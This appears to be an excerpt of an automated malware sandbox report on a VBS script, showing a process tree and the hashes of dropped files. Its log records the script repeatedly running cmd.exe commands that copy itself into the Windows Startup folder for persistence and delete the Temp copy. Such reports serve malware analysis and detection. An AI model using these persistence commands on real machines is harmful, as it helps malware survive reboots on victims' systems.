C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4992
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3668
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2400
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3752
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2672
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3232
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4116
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3956
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2816
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3292
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:916
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:540
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4872
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3472
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4780
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3060
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3000
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:964
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2356
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4392
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1752
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4388
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:4904
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:2960
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:3664
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1060
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:1240
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs"4⤵PID:448
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
313B
MD5015ef35c372e5538824a9fa3cf7e5df1
SHA133d3226f848ea00752880d32d25e8c75c7fe1016
SHA256ffaecc6871d40b14f8492da43362dd1b628eb4439de9ea967bf41a1ee453d830
SHA512ac6ac4f190fbbbbfaa0c11727f7a061c8051e1112910fc6bc4a4755ae170cca686ec1326d1a59ade8b2e72422dd124896e4b76549eb24c5b91661b9df238a4b2
-
Filesize
377B
MD53447d10b17626497a24e3f8e9e3e2086
SHA1131a1a9365cf9d6659e26805f9daa7cbbad8abde
SHA2561b8480048e05ca8b1adf55548506a37c5b15307187f8e575dda9760b2e311ec1
SHA51216369348d6812b6094a2b6a193d2d2cae07b9a9321d0c1e99f906d1410738cd1a1dac6d0384186009a675ef992887d89533a6bcffd26bbb65cf6899488d79c15
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761.vbs
Filesize703KB
MD5f1b75f0121271d4e6f174d28e3821244
SHA14d3ece676f79050cfa65c539edf6c34b29d82038
SHA256cee8a2a5680717eeae5f7703ccaff27a4fcbe22b4db78c9671308d1bedefd761
SHA5123ae88843320ef8cc73b311c84fc0158a439e83bf08c612a6757cc2c1ae9ffd9d091400a3ac354abeff3f6274222ef995bf5d4a57f74d084790313105a24d6437